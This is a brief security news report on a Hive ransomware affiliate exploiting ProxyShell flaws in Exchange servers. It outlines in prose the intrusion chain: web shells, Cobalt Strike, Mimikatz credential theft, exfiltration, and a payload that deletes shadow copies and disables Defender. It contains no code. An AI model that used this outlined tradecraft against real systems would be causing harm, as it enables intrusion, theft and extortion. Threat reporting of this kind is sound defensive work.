Hive ransomware affiliate exploits vulnerable Microsoft Exchange servers

Microsoft Exchange servers unpatched to ProxyShell security vulnerabilities are being attacked by an affiliate of the Hive ransomware group to facilitate the distribution of the Cobalt Strike beacon and other backdoors, reports BleepingComputer. Varonis researchers discovered that the Hive ransomware affiliate exploited ProxyShell flaws, which have already been patched in May, before deploying four web shells in an Exchange directory and carrying out PowerShell code to facilitate Cobalt Strike stager downloads. The Mimikatz credential stealer was then leveraged to exfiltrate domain admin account passwords and allow lateral movement, as well as increased network asset access, the report revealed. Attackers then performed extensive operations for determining valuable data, as evidenced by network scanners, device and directory enumerations, IP address lists, and SQL database scans. The report also detailed that file exfiltration was followed by the execution of the Golang-based ransomware payload dubbed "Windows.exe," which was found to erase shadow copies and Windows event logs, as well as deactivate Windows Defender prior to file encryption.